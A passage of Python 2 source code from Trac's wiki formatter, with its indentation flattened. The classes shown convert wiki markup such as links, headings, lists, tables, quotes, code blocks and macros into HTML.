if match.group(1) and 'code' in match.group(1):
content_for_span = match.group(2)
else:
interrupt_paragraph = True
elif re.match(self._block_elem_re, text):
interrupt_paragraph = True
if content_for_span:
text = tag.span(class_='code-block')(*content_for_span)
elif interrupt_paragraph and in_paragraph:
text = "</p>%s<p>" % _markup_to_unicode(text)
return text
class Formatter(object):
"""Base Wiki formatter.
Parses and formats wiki text, in a given `RenderingContext`.
"""
flavor = 'default'
def __init__(self, env, context):
self.env = env
self.context = context.child()
self.context.set_hints(disable_warnings=True)
self.req = context.req
self.href = context.href
self.resource = context.resource
self.perm = context.perm
self.wiki = WikiSystem(self.env)
self.wikiparser = WikiParser(self.env)
self._anchors = {}
self._open_tags = []
self._safe_schemes = None
if not self.wiki.render_unsafe_content:
self._safe_schemes = set(self.wiki.safe_schemes)
def split_link(self, target):
return split_url_into_path_query_fragment(target)
# -- Pre- IWikiSyntaxProvider rules (Font styles)
_indirect_tags = {
'MM_BOLD': (u'<strong>', u'</strong>'),
'WC_BOLD': (u'<strong>', u'</strong>'),
'MM_ITALIC': (u'<em>', u'</em>'),
'WC_ITALIC': (u'<em>', u'</em>'),
'MM_UNDERLINE': (u'<span class="underline">', u'</span>'),
'MM_STRIKE': (u'<del>', u'</del>'),
'MM_SUBSCRIPT': (u'<sub>', u'</sub>'),
'MM_SUPERSCRIPT': (u'<sup>', u'</sup>'),
}
def _get_open_tag(self, tag):
"""Retrieve opening tag for direct or indirect `tag`."""
if not isinstance(tag, tuple):
tag = self._indirect_tags[tag]
return tag[0]
def _get_close_tag(self, tag):
"""Retrieve closing tag for direct or indirect `tag`."""
if not isinstance(tag, tuple):
tag = self._indirect_tags[tag]
return tag[1]
def tag_open_p(self, tag):
"""Do we currently have any open tag with `tag` as end-tag?"""
return tag in self._open_tags
def flush_tags(self):
while self._open_tags != []:
self.out.write(self._get_close_tag(self._open_tags.pop()))
def open_tag(self, tag_open, tag_close=None):
"""Open an inline style tag.
If `tag_close` is not specified, `tag_open` is an indirect tag (0.12)
"""
if tag_close:
self._open_tags.append((tag_open, tag_close))
else:
self._open_tags.append(tag_open)
tag_open = self._get_open_tag(tag_open)
return tag_open
def close_tag(self, open_tag, close_tag=None):
"""Open a inline style tag.
If `close_tag` is not specified, it's an indirect tag (0.12)
"""
tmp = ''
for i in xrange(len(self._open_tags) - 1, -1, -1):
tag = self._open_tags[i]
tmp += self._get_close_tag(tag)
if (open_tag == tag,
(open_tag, close_tag) == tag)[bool(close_tag)]:
del self._open_tags[i]
for j in xrange(i, len(self._open_tags)):
tmp += self._get_open_tag(self._open_tags[j])
break
return tmp
def _indirect_tag_handler(self, match, tag):
"""Handle binary inline style tags (indirect way, 0.12)"""
if self._list_stack and not self.in_list_item:
self.close_list()
if self.tag_open_p(tag):
return self.close_tag(tag)
else:
return self.open_tag(tag)
def _bolditalic_formatter(self, match, fullmatch):
if self._list_stack and not self.in_list_item:
self.close_list()
bold_open = self.tag_open_p('MM_BOLD')
italic_open = self.tag_open_p('MM_ITALIC')
if bold_open and italic_open:
bold_idx = self._open_tags.index('MM_BOLD')
italic_idx = self._open_tags.index('MM_ITALIC')
if italic_idx < bold_idx:
close_tags = ('MM_BOLD', 'MM_ITALIC')
else:
close_tags = ('MM_ITALIC', 'MM_BOLD')
open_tags = ()
elif bold_open:
close_tags = ('MM_BOLD',)
open_tags = ('MM_ITALIC',)
elif italic_open:
close_tags = ('MM_ITALIC',)
open_tags = ('MM_BOLD',)
else:
close_tags = ()
open_tags = ('MM_BOLD', 'MM_ITALIC')
tmp = []
tmp.extend(self.close_tag(tag) for tag in close_tags)
tmp.extend(self.open_tag(tag) for tag in open_tags)
return ''.join(tmp)
def _bold_formatter(self, match, fullmatch):
return self._indirect_tag_handler(match, 'MM_BOLD')
def _bold_wc_formatter(self, match, fullmatch):
return self._indirect_tag_handler(match, 'WC_BOLD')
def _italic_formatter(self, match, fullmatch):
return self._indirect_tag_handler(match, 'MM_ITALIC')
def _italic_wc_formatter(self, match, fullmatch):
return self._indirect_tag_handler(match, 'WC_ITALIC')
def _underline_formatter(self, match, fullmatch):
return self._indirect_tag_handler(match, 'MM_UNDERLINE')
def _strike_formatter(self, match, fullmatch):
return self._indirect_tag_handler(match, 'MM_STRIKE')
def _subscript_formatter(self, match, fullmatch):
return self._indirect_tag_handler(match, 'MM_SUBSCRIPT')
def _superscript_formatter(self, match, fullmatch):
return self._indirect_tag_handler(match, 'MM_SUPERSCRIPT')
def _inlinecode_formatter(self, match, fullmatch):
return tag.code(fullmatch.group('inline'))
def _inlinecode2_formatter(self, match, fullmatch):
return tag.code(fullmatch.group('inline2'))
# pre-0.12 public API (no longer used by Trac itself but kept for plugins)
def simple_tag_handler(self, match, open_tag, close_tag):
"""Generic handler for simple binary style tags"""
if self.tag_open_p((open_tag, close_tag)):
return self.close_tag(open_tag, close_tag)
else:
self.open_tag(open_tag, close_tag)
return open_tag
# -- Post- IWikiSyntaxProvider rules
# WikiCreole line breaks
def _linebreak_wc_formatter(self, match, fullmatch):
return '<br />'
# E-mails
def _email_formatter(self, match, fullmatch):
from trac.web.chrome import Chrome
omatch = Chrome(self.env).format_emails(self.context, match)
if omatch == match: # not obfuscated, make a link
return self._make_mail_link('mailto:'+match, match)
else:
return omatch
# HTML escape of &, < and >
def _htmlescape_formatter(self, match, fullmatch):
return u"&" if match == "&" \
else u"<" if match == "<" else u">"
# Short form (shref) and long form (lhref) of TracLinks
def _shrefbr_formatter(self, match, fullmatch):
ns = fullmatch.group('snsbr')
target = unquote_label(fullmatch.group('stgtbr'))
match = match[1:-1]
return u'<%s>' % \
self._make_link(ns, target, match, match, fullmatch)
def _shref_formatter(self, match, fullmatch):
ns = fullmatch.group('sns')
target = unquote_label(fullmatch.group('stgt'))
return self._make_link(ns, target, match, match, fullmatch)
def _lhref_formatter(self, match, fullmatch):
rel = fullmatch.group('rel')
ns = fullmatch.group('lns')
target = unquote_label(fullmatch.group('ltgt'))
label = fullmatch.group('label')
return self._make_lhref_link(match, fullmatch, rel, ns, target, label)
def _make_lhref_link(self, match, fullmatch, rel, ns, target, label):
if not label: # e.g. `[http://target]` or `[wiki:target]`
if target:
if ns and target.startswith('//'): # for `[http://target]`
label = ns + ':' + target # use `http://target`
else: # for `wiki:target`
label = target.lstrip('/') # use only `target`
else: # e.g. `[search:]`
label = ns
else:
label = unquote_label(label)
if rel:
if not label:
label = self.wiki.make_label_from_target(rel)
path, query, fragment = self.split_link(rel)
if path.startswith('//'):
path = '/' + path.lstrip('/')
elif path.startswith('/'):
path = self.href + path
else:
resource = get_relative_resource(self.resource, path)
path = get_resource_url(self.env, resource, self.href)
if resource.id:
target = concat_path_query_fragment(unicode(resource.id),
query, fragment)
if resource.realm == 'wiki':
target = '/' + target # Avoid wiki page scoping
return self._make_link(resource.realm, target, match,
label, fullmatch)
return tag.a(label,
href=concat_path_query_fragment(path, query, fragment))
else:
return self._make_link(ns or 'wiki', target or '', match, label,
fullmatch)
def _make_link(self, ns, target, match, label, fullmatch):
# first check for an alias defined in trac.ini
ns = self.env.config['intertrac'].get(ns, ns)
if ns in self.wikiparser.link_resolvers:
resolver = self.wikiparser.link_resolvers[ns]
if arity(resolver) == 5:
return resolver(self, ns, target, escape(label, False),
fullmatch)
else:
return resolver(self, ns, target, escape(label, False))
elif ns == "mailto":
from trac.web.chrome import Chrome
chrome = Chrome(self.env)
if chrome.never_obfuscate_mailto:
otarget, olabel = target, label
else:
otarget = chrome.format_emails(self.context, target)
olabel = chrome.format_emails(self.context, label)
if (otarget, olabel) == (target, label):
return self._make_mail_link('mailto:'+target, label)
else:
return olabel or otarget
elif target.startswith('//'):
if self._safe_schemes is None or ns in self._safe_schemes:
return self._make_ext_link(ns + ':' + target, label)
else:
return escape(match)
else:
return self._make_intertrac_link(ns, target, label) or \
self._make_interwiki_link(ns, target, label) or \
escape(match)
def _make_intertrac_link(self, ns, target, label):
res = self.get_intertrac_url(ns, target)
if res:
return self._make_ext_link(res[0], label, res[1])
def get_intertrac_url(self, ns, target):
intertrac = self.env.config['intertrac']
url = intertrac.get(ns + '.url')
if not url and ns == 'trac':
url = 'http://trac.edgewall.org'
if url:
name = intertrac.get(ns + '.title', 'Trac project %s' % ns)
url = '%s/intertrac/%s' % (url, unicode_quote(target))
if target:
title = _('%(target)s in %(name)s', target=target, name=name)
else:
title = name
return url, title
def shorthand_intertrac_helper(self, ns, target, label, fullmatch):
if fullmatch: # short form
it_group = fullmatch.groupdict().get('it_' + ns)
if it_group:
alias = it_group.strip()
intertrac = self.env.config['intertrac']
target = '%s:%s' % (ns, target[len(it_group):])
return self._make_intertrac_link(intertrac.get(alias, alias),
target, label) or label
def _make_interwiki_link(self, ns, target, label):
from trac.wiki.interwiki import InterWikiMap
interwiki = InterWikiMap(self.env)
if ns in interwiki:
url, title = interwiki.url(ns, target)
if url:
return self._make_ext_link(url, label, title)
def _make_ext_link(self, url, text, title=''):
local_url = self.env.project_url or self.env.abs_href.base
if not url.startswith(local_url):
return tag.a(tag.span(u'\u200b', class_="icon"), text,
class_="ext-link", href=url, title=title or None)
else:
return tag.a(text, href=url, title=title or None)
def _make_mail_link(self, url, text, title=''):
return tag.a(tag.span(u'\u200b', class_="icon"), text,
class_="mail-link", href=url, title=title or None)
# Anchors
def _anchor_formatter(self, match, fullmatch):
anchor = fullmatch.group('anchorname')
label = fullmatch.group('anchorlabel') or ''
if label:
label = format_to_oneliner(self.env, self.context, label)
return '<span class="wikianchor" id="%s">%s</span>' % (anchor, label)
def _unique_anchor(self, anchor):
i = 1
anchor_base = anchor
while anchor in self._anchors:
anchor = anchor_base + str(i)
i += 1
self._anchors[anchor] = True
return anchor
# WikiMacros or WikiCreole links
def _macrolink_formatter(self, match, fullmatch):
# check for a known [[macro]]
macro_or_link = match[2:-2]
if macro_or_link.startswith('=#'):
fullmatch = WikiParser._set_anchor_wc_re.match(macro_or_link)
if fullmatch:
return self._anchor_formatter(macro_or_link, fullmatch)
fullmatch = WikiParser._macro_re.match(macro_or_link)
if fullmatch:
name = fullmatch.group('macroname')
args = fullmatch.group('macroargs')
macro = False # not a macro
macrolist = name[-1] == '?'
if name.lower() == 'br' or name == '?':
macro = None
else:
macro = WikiProcessor(self, (name, name[:-1])[macrolist])
if macro.error:
macro = False
if macro is not False:
if macrolist:
macro = WikiProcessor(self, 'MacroList')
return self._macro_formatter(match, fullmatch, macro)
fullmatch = WikiParser._creolelink_re.match(macro_or_link)
return self._lhref_formatter(match, fullmatch)
def _macro_formatter(self, match, fullmatch, macro, only_inline=False):
name = fullmatch.group('macroname')
if name and name[-1] == '?': # Macro?() shortcut for MacroList(Macro)
args = name[:-1] or '*'
else:
args = fullmatch.group('macroargs')
if name.lower() == 'br':
return self.emit_linebreak(args)
in_paragraph = not (getattr(self, 'in_list_item', True) or
getattr(self, 'in_table', True) or
getattr(self, 'in_def_list', True))
try:
return macro.ensure_inline(macro.process(args), in_paragraph)
except MacroError as e:
return system_message(_("Macro %(name)s(%(args)s) failed",
name=name, args=args), to_fragment(e))
except Exception as e:
self.env.log.error("Macro %s(%s) failed for %s:%s", name,
args, self.resource,
exception_to_unicode(e, traceback=True))
return system_message(_("Error: Macro %(name)s(%(args)s) failed",
name=name, args=args), to_fragment(e))
def emit_linebreak(self, args):
if args:
sep = ':' if ':' in args else '='
kv = args.split(sep, 1)
if kv[0] == 'clear':
clear = kv[-1] if kv[-1] in ['left', 'right'] else 'both'
return '<br style="clear: {0}" />'.format(clear)
return '<br />'
# Headings
def _parse_heading(self, match, fullmatch, shorten):
match = match.strip()
hdepth = fullmatch.group('hdepth')
depth = len(hdepth)
anchor = fullmatch.group('hanchor') or ''
htext = fullmatch.group('htext').strip()
if htext.endswith(hdepth):
htext = htext[:-depth]
heading = format_to_oneliner(self.env, self.context, htext, False)
if anchor:
anchor = anchor[1:]
else:
sans_markup = plaintext(heading, keeplinebreaks=False)
anchor = WikiParser._anchor_re.sub('', sans_markup)
if not anchor or anchor[0].isdigit() or anchor[0] in '.-':
# an ID must start with a Name-start character in XHTML
anchor = 'a' + anchor # keeping 'a' for backward compat
anchor = self._unique_anchor(anchor)
if shorten:
heading = format_to_oneliner(self.env, self.context, htext, True)
return depth, heading, anchor
def _heading_formatter(self, match, fullmatch):
self.close_table()
self.close_paragraph()
self.close_indentation()
self.close_list()
self.close_def_list()
depth, heading, anchor = self._parse_heading(match, fullmatch, False)
self.out.write(u'<h%d class="section" id="%s">%s</h%d>' %
(depth, anchor, heading, depth))
# Generic indentation (as defined by lists and quotes)
def _set_tab(self, depth):
"""Append a new tab if needed and truncate tabs deeper than `depth`
given: -*-----*--*---*--
setting: *
results in: -*-----*-*-------
"""
tabstops = []
for ts in self._tabstops:
if ts >= depth:
break
tabstops.append(ts)
tabstops.append(depth)
self._tabstops = tabstops
# Lists
def _list_formatter(self, match, fullmatch):
ldepth = len(fullmatch.group('ldepth'))
listid = match[ldepth]
self.in_list_item = True
class_ = start = None
if listid in WikiParser.BULLET_CHARS:
type_ = 'ul'
else:
type_ = 'ol'
lstart = fullmatch.group('lstart')
if listid == 'i':
class_ = 'lowerroman'
elif listid == 'I':
class_ = 'upperroman'
elif listid.isdigit() and lstart != '1':
start = int(lstart)
elif listid.islower():
class_ = 'loweralpha'
if len(lstart) == 1 and lstart != 'a':
start = ord(lstart) - ord('a') + 1
elif listid.isupper():
class_ = 'upperalpha'
if len(lstart) == 1 and lstart != 'A':
start = ord(lstart) - ord('A') + 1
self._set_list_depth(ldepth, type_, class_, start)
return ''
def _get_list_depth(self):
"""Return the space offset associated to the deepest opened list."""
if self._list_stack:
return self._list_stack[-1][1]
return -1
def _set_list_depth(self, depth, new_type=None, lclass=None, start=None):
def open_list():
self.close_table()
self.close_paragraph()
self.close_indentation() # FIXME: why not lists in quotes?
self._list_stack.append((new_type, depth))
self._set_tab(depth)
class_attr = ' class="%s"' % lclass if lclass else ''
start_attr = ' start="%s"' % start if start is not None else ''
self.out.write(u'<' + new_type + class_attr + start_attr + '><li>')
def close_item():
self.flush_tags()
self.out.write(u'</li>')
def close_list(tp):
self._list_stack.pop()
close_item()
self.out.write(u'</%s>' % tp)
# depending on the indent/dedent, open or close lists
if depth > self._get_list_depth():
open_list()
else:
while self._list_stack:
deepest_type, deepest_offset = self._list_stack[-1]
if depth >= deepest_offset:
break
close_list(deepest_type)
if new_type and depth >= 0:
if self._list_stack:
old_type, old_offset = self._list_stack[-1]
if new_type and old_type != new_type:
close_list(old_type)
open_list()
else:
if old_offset != depth: # adjust last depth
self._list_stack[-1] = (old_type, depth)
close_item()
self.out.write(u'<li>')
else:
open_list()
def close_list(self, depth=-1):
self._set_list_depth(depth)
# Definition Lists
def _definition_formatter(self, match, fullmatch):
if self.in_def_list:
tmp = '</dd>'
else:
self.close_paragraph()
tmp = '<dl class="wiki">'
definition = match[:match.find('::')]
tmp += '<dt>%s</dt><dd>' % format_to_oneliner(self.env, self.context,
definition)
self.in_def_list = True
return tmp
def close_def_list(self):
if self.in_def_list:
self.out.write(u'</dd></dl>\n')
self.in_def_list = False
# Blockquote
def _indent_formatter(self, match, fullmatch):
idepth = len(fullmatch.group('idepth'))
if self._list_stack:
ltype, ldepth = self._list_stack[-1]
if idepth < ldepth:
for _, ldepth in self._list_stack:
if idepth > ldepth:
self.in_list_item = True
self._set_list_depth(idepth)
return ''
elif idepth <= ldepth + (3 if ltype == 'ol' else 2):
self.in_list_item = True
return ''
if not self.in_def_list:
self._set_quote_depth(idepth)
return ''
def close_indentation(self):
self._set_quote_depth(0)
def _get_quote_depth(self):
"""Return the space offset associated to the deepest opened quote."""
return self._quote_stack[-1] if self._quote_stack else 0
def _set_quote_depth(self, depth, citation=False):
def open_quote(depth):
self.close_table()
self.close_paragraph()
self.close_list()
def open_one_quote(d):
self._quote_stack.append(d)
self._set_tab(d)
class_attr = ' class="citation"' if citation else ''
self.out.write(u'<blockquote%s>\n' % class_attr)
if citation:
for d in xrange(quote_depth+1, depth+1):
open_one_quote(d)
else:
open_one_quote(depth)
def close_quote():
self.close_table()
self.close_paragraph()
self._quote_stack.pop()
self.out.write(u'</blockquote>\n')
quote_depth = self._get_quote_depth()
if depth > quote_depth:
self._set_tab(depth)
tabstops = self._tabstops[::-1]
while tabstops:
tab = tabstops.pop()
if tab > quote_depth:
open_quote(tab)
else:
while self._quote_stack:
deepest_offset = self._quote_stack[-1]
if depth >= deepest_offset:
break
close_quote()
if not citation and depth > 0:
if self._quote_stack:
old_offset = self._quote_stack[-1]
if old_offset != depth: # adjust last depth
self._quote_stack[-1] = depth
else:
open_quote(depth)
if depth > 0:
self.in_quote = True
# Table
def _table_cell_formatter(self, match, fullmatch):
self.open_table()
self.open_table_row()
self.continue_table = 1
separator = fullmatch.group('table_cell_sep')
is_last = fullmatch.group('table_cell_last')
numpipes = len(separator)
cell = 'td'
if separator[0] == '=':
numpipes -= 1
if separator[-1] == '=':
numpipes -= 1
cell = 'th'
colspan = numpipes / 2
if is_last is not None:
if is_last and is_last[-1] == '\\':
self.continue_table_row = 1
colspan -= 1
if not colspan:
return ''
attrs = ''
if colspan > 1:
attrs = ' colspan="%d"' % int(colspan)
# alignment: ||left || right||default|| default || center ||
after_sep = fullmatch.end('table_cell_sep')
alignleft = after_sep < len(self.line) and self.line[after_sep] != ' '
# lookahead next || (FIXME: this fails on ` || ` inside the cell)
next_sep = re.search(r'([^!])=?\|\|', self.line[after_sep:])
alignright = next_sep and next_sep.group(1) != ' '
textalign = None
if alignleft:
if not alignright:
textalign = 'left'
elif alignright:
textalign = 'right'
elif next_sep: # check for the extra spaces specifying a center align
first_extra = after_sep + 1
last_extra = after_sep + next_sep.start() - 1
if first_extra < last_extra and \
self.line[first_extra] == self.line[last_extra] == ' ':
textalign = 'center'
if textalign:
attrs += ' style="text-align: %s"' % textalign
td = '<%s%s>' % (cell, attrs)
if self.in_table_cell:
td = '</%s>' % self.in_table_cell + td
self.in_table_cell = cell
return td
def _table_row_sep_formatter(self, match, fullmatch):
self.open_table()
self.close_table_row(force=True)
params = fullmatch.group('table_row_params')
if params:
tr = WikiProcessor(self, 'tr', self.parse_processor_args(params))
processed = _markup_to_unicode(tr.process(''))
params = processed[3:processed.find('>')]
self.open_table_row(params or '')
self.continue_table = 1
self.continue_table_row = 1
def open_table(self):
if not self.in_table:
self.close_paragraph()
self.close_list()
self.close_def_list()
self.in_table = 1
self.out.write(u'<table class="wiki">\n')
def open_table_row(self, params=''):
if not self.in_table_row:
self.open_table()
self.in_table_row = 1
self.out.write(u'<tr%s>' % params)
def close_table_row(self, force=False):
if self.in_table_row and (not self.continue_table_row or force):
self.in_table_row = 0
if self.in_table_cell:
self.out.write(u'</%s>' % self.in_table_cell)
self.in_table_cell = ''
self.out.write(u'</tr>')
self.continue_table_row = 0
def close_table(self):
if self.in_table:
self.close_table_row(force=True)
self.out.write(u'</table>\n')
self.in_table = 0
# Paragraphs
def open_paragraph(self):
if not self.paragraph_open:
self.out.write(u'<p>\n')
self.paragraph_open = 1
def close_paragraph(self):
self.flush_tags()
if self.paragraph_open:
self.out.write(u'</p>\n')
self.paragraph_open = 0
# Code blocks
def parse_processor_args(self, line):
return parse_processor_args(line)
def handle_code_block(self, line, startmatch=None):
if startmatch:
self.in_code_block += 1
if self.in_code_block == 1:
name = startmatch.group(2)
if name:
args = parse_processor_args(line[startmatch.end():])
self.code_processor = WikiProcessor(self, name, args)
else:
self.code_processor = None
self.code_buf = []
self.code_prefix = line[:line.find(WikiParser.STARTBLOCK)]
else:
self.code_buf.append(line)
if not self.code_processor:
self.code_processor = WikiProcessor(self, 'default')
elif line.strip() == WikiParser.ENDBLOCK:
self.in_code_block -= 1
if self.in_code_block == 0 and self.code_processor:
if self.code_processor.name not in ('th', 'td', 'tr'):
self.close_table()
self.close_paragraph()
if self.code_buf:
if self.code_prefix and all(not l or
l.startswith(self.code_prefix)
for l in self.code_buf):
code_indent = len(self.code_prefix)
self.code_buf = [l[code_indent:]
for l in self.code_buf]
self.code_buf.append('')
code_text = '\n'.join(self.code_buf)
processed = self._exec_processor(self.code_processor,
code_text)
self.out.write(_markup_to_unicode(processed))
else:
self.code_buf.append(line)
elif not self.code_processor:
match = WikiParser._processor_re.match(line)
if match:
self.code_prefix = match.group(1)
name = match.group(2)
args = parse_processor_args(line[match.end():])
self.code_processor = WikiProcessor(self, name, args)
else:
self.code_buf.append(line)
self.code_processor = WikiProcessor(self, 'default')
else:
self.code_buf.append(line)
def close_code_blocks(self):
while self.in_code_block > 0:
self.handle_code_block(WikiParser.ENDBLOCK)
def _exec_processor(self, processor, text):
try:
return processor.process(text)
except ProcessorError as e:
return system_message(_("Processor %(name)s failed",
name=processor.name), to_fragment(e))
except Exception as e:
self.env.log.error("Processor %s failed for %s:%s",
processor.name, self.resource,
exception_to_unicode(e, traceback=True))
return system_message(_("Error: Processor %(name)s failed",
name=processor.name), to_fragment(e))
# > quotes
def handle_quote_block(self, line):
self.close_paragraph()
depth = line.find('>')
# Close lists up to current level:
#
# - first level item
# - second level item
# > citation part of first level item
#
# (depth == 3, _list_stack == [1, 3])
if not self._quote_buffer and depth < self._get_list_depth():
self.close_list(depth)
self._quote_buffer.append(line[depth + 1:])
def close_quote_block(self, escape_newlines):
if self._quote_buffer:
# avoid an extra <blockquote> when there's consistently one space
# after the '>'
if all(not line or line[0] in '> ' for line in self._quote_buffer):
self._quote_buffer = [line[bool(line and line[0] == ' '):]
for line in self._quote_buffer]
self.out.write(u'<blockquote class="citation">\n')
Formatter(self.env, self.context).format(self._quote_buffer,
self.out, escape_newlines)
self.out.write(u'</blockquote>\n')
self._quote_buffer = []
# -- Wiki engine
def handle_match(self, fullmatch):
for itype, match in fullmatch.groupdict().items():
if match and not itype in self.wikiparser.helper_patterns:
# Check for preceding escape character '!'
if match[0] == '!':
return escape(match[1:])
if itype in self.wikiparser.external_handlers:
external_handler = self.wikiparser.external_handlers[itype]
return external_handler(self, match, fullmatch)
else:
internal_handler = getattr(self, '_%s_formatter' % itype)
return internal_handler(match, fullmatch)
def replace(self, fullmatch):
"""Replace one match with its corresponding expansion"""
replacement = self.handle_match(fullmatch)
if replacement:
return _markup_to_unicode(replacement)
_normalize_re = re.compile(r'[\v\f]', re.UNICODE)
def reset(self, source, out=None):
if isinstance(source, basestring):
source = re.sub(self._normalize_re, ' ', source)
self.source = source
class NullOut(object):
def write(self, data):
pass
self.out = out or NullOut()
self._open_tags = []
self._list_stack = []
self._quote_stack = []
self._tabstops = []
self._quote_buffer = []
self.in_code_block = 0
self.in_table = 0
self.in_def_list = 0
self.in_table_row = 0
self.continue_table = 0
self.continue_table_row = 0
self.in_table_cell = ''
self.paragraph_open = 0
return source
def format(self, text, out=None, escape_newlines=False):
text = self.reset(text, out)
if isinstance(text, basestring):
text = text.splitlines()
for line in text:
if isinstance(line, str):
line = line.decode('utf-8')
# Detect start of code block (new block or embedded block)
block_start_match = None
if WikiParser.ENDBLOCK not in line:
block_start_match = WikiParser._startblock_re.match(line)
# Handle content or end of code block
if self.in_code_block:
self.handle_code_block(line, block_start_match)
continue
# Handle citation quotes '> ...'
if line.strip().startswith('>'):
self.handle_quote_block(line)
continue
# Handle end of citation quotes
self.close_quote_block(escape_newlines)
# Handle start of a new block
if block_start_match:
self.handle_code_block(line, block_start_match)
continue
# Handle Horizontal ruler
if line[0:4] == '----':
self.close_table()
self.close_paragraph()
self.close_indentation()
self.close_list()
self.close_def_list()
self.out.write(u'<hr />\n')
continue
# Handle new paragraph
if line == '':
self.close_table()
self.close_paragraph()
self.close_indentation()
self.close_list()
self.close_def_list()
continue
# Tab expansion and clear tabstops if no indent
line = line.replace('\t', ' '*8)
if not line.startswith(' '):
self._tabstops = []
# Handle end of indentation
if not line.startswith(' ') and self._quote_stack:
self.close_indentation()
self.in_list_item = False
self.in_quote = False
# Throw a bunch of regexps on the problem
self.line = line
result = re.sub(self.wikiparser.rules, self.replace, line)
if not self.in_list_item:
self.close_list()
if not self.in_quote:
self.close_indentation()
if self.in_def_list and not line.startswith(' '):
self.close_def_list()
if self.in_table and not self.continue_table:
self.close_table()
self.continue_table = 0
sep = '\n'
if not(self.in_list_item or self.in_def_list or self.in_table):
if len(result):
self.open_paragraph()
if escape_newlines and self.paragraph_open and \
not result.rstrip().endswith('<br />'):
sep = '<br />' + sep
self.out.write(result + sep)
self.close_table_row()
self.close_code_blocks()
self.close_quote_block(escape_newlines)
self.close_table()
self.close_paragraph()
self.close_indentation()
self.close_list()
self.close_def_list()
class OneLinerFormatter(Formatter):
"""
A special version of the wiki formatter that only implement a
subset of the wiki formatting functions. This version is useful
for rendering short wiki-formatted messages on a single line
"""
flavor = 'oneliner'
# Override a few formatters to disable some wiki syntax in "oneliner"-mode
def _list_formatter(self, match, fullmatch):
return match
def _indent_formatter(self, match, fullmatch):
return match
def _citation_formatter(self, match, fullmatch):
return escape(match, False)
def _heading_formatter(self, match, fullmatch):
return escape(match, False)
def _definition_formatter(self, match, fullmatch):
return escape(match, False)
def _table_cell_formatter(self, match, fullmatch):
return match
def _table_row_sep_formatter(self, match, fullmatch):
return ''
def _linebreak_wc_formatter(self, match, fullmatch):
return ' '
def _macro_formatter(self, match, fullmatch, macro):
name = fullmatch.group('macroname')
if name.lower() == 'br':
return ' '
args = fullmatch.group('macroargs')
if macro.is_inline(args):
return Formatter._macro_formatter(self, match, fullmatch, macro)
else:
return '[[%s%s]]' % (name, '(...)' if args else '')
def format(self, text, out, shorten=False):
if not text:
return
text = self.reset(text, out)
# Simplify code blocks
in_code_block = 0
processor = None
buf = io.StringIO()
for line in text.strip().splitlines():
if isinstance(line, str):
line = line.decode('utf-8')
if WikiParser.ENDBLOCK not in line and \
WikiParser._startblock_re.match(line):
in_code_block += 1
elif line.strip() == WikiParser.ENDBLOCK:
if in_code_block:
in_code_block -= 1
if in_code_block == 0:
if processor != 'comment':
buf.write(u' [...]\n')
processor = None
elif in_code_block:
if not processor:
if line.startswith('#!'):
processor = line[2:].strip()
else:
buf.write(line + '\n')
result = buf.getvalue()[:-len('\n')]
if shorten:
result = shorten_line(result)
result = re.sub(self.wikiparser.rules, self.replace, result)
result = result.replace('[...]', u'[\u2026]')
if result.endswith('...'):
result = result[:-3] + u'\u2026'
self.out.write(result)
# Close all open 'one line'-tags
self.flush_tags()
# Flush unterminated code blocks
if in_code_block > 0:
self.out.write(u'[\u2026]')
class OutlineFormatter(Formatter):
"""Special formatter that generates an outline of all the headings."""
flavor = 'outline'
# Avoid the possible side-effects of rendering WikiProcessors
def _macro_formatter(self, match, fullmatch, macro):
name = fullmatch.group('macroname')
if name.lower() == 'br':
return ' '
args = fullmatch.group('macroargs')
if macro.is_inline(args):
return Formatter._macro_formatter(self, match, fullmatch, macro)
return ''
def handle_code_block(self, line, startmatch=None):
if WikiParser.ENDBLOCK not in line and \
WikiParser._startblock_re.match(line):
self.in_code_block += 1
elif line.strip() == WikiParser.ENDBLOCK:
self.in_code_block -= 1
def format(self, text, out, max_depth=6, min_depth=1, shorten=True):
self.shorten = shorten
whitespace_indent = ' '
self.outline = []
Formatter.format(self, text)
if min_depth > max_depth:
min_depth, max_depth = max_depth, min_depth
max_depth = min(6, max_depth)
min_depth = max(1, min_depth)
curr_depth = min_depth - 1
out.write(u'\n')
for depth, anchor, text in self.outline:
if depth < min_depth or depth > max_depth:
continue
if depth > curr_depth: # Deeper indent
for i in xrange(curr_depth, depth):
out.write(whitespace_indent * (2*i) + u'<ol>\n' +
whitespace_indent * (2*i+1) + u'<li>\n')
elif depth < curr_depth: # Shallower indent
for i in xrange(curr_depth-1, depth-1, -1):
out.write(whitespace_indent * (2*i+1) + u'</li>\n' +
whitespace_indent * (2*i) + u'</ol>\n')
out.write(whitespace_indent * (2*depth-1) + u'</li>\n' +
whitespace_indent * (2*depth-1) + u'<li>\n')
else: # Same indent
out.write( whitespace_indent * (2*depth-1) + u'</li>\n' +
whitespace_indent * (2*depth-1) + u'<li>\n')
curr_depth = depth
out.write(whitespace_indent * (2*depth) +
u'<a href="#%s">%s</a>\n' % (anchor, text))
# Close out all indentation
for i in xrange(curr_depth-1, min_depth-2, -1):
out.write(whitespace_indent * (2*i+1) + u'</li>\n' +
whitespace_indent * (2*i) + u'</ol>\n')
def _heading_formatter(self, match, fullmatch):
depth, heading, anchor = self._parse_heading(match, fullmatch,
self.shorten)
heading = re.sub(r'</?a(?: .*?)?>', '', heading) # Strip out link tags
self.outline.append((depth, anchor, heading))
class LinkFormatter(OutlineFormatter):
"""Special formatter that focuses on TracLinks."""
flavor = 'link'
def _heading_formatter(self, match, fullmatch):
return ''
def match(self, wikitext):
"""Return the Wiki match found at the beginning of the `wikitext`"""
wikitext = self.reset(wikitext)
self.line = wikitext
match = re.match(self.wikiparser.rules, wikitext)
if match:
return self.handle_match(match)
# Pure Wiki Formatter
class HtmlFormatter(object):
"""Format parsed wiki text to HTML"""
flavor = 'default'
def __init__(self, env, context, wikidom):
self.env = env
self.context = context
if isinstance(wikidom, basestring):
wikidom = WikiParser(env).parse(wikidom)
self.wikidom = wikidom
def generate(self, escape_newlines=False):
"""Generate HTML elements.
newlines in the wikidom will be preserved if `escape_newlines` is set.
"""
# FIXME: compatibility code only for now
out = io.StringIO()
Formatter(self.env, self.context).format(self.wikidom, out,
escape_newlines)
return Markup(out.getvalue())
class InlineHtmlFormatter(object):
"""Format parsed wiki text to inline elements HTML.
Block level content will be discarded or compacted.
"""
flavor = 'oneliner'
def __init__(self, env, context, wikidom):
self.env = env
self.context = context
if isinstance(wikidom, basestring):
wikidom = WikiParser(env).parse(wikidom)
self.wikidom = wikidom
def generate(self, shorten=False):
"""Generate HTML inline elements.
If `shorten` is set, the generation will stop once enough characters
have been emitted.
"""
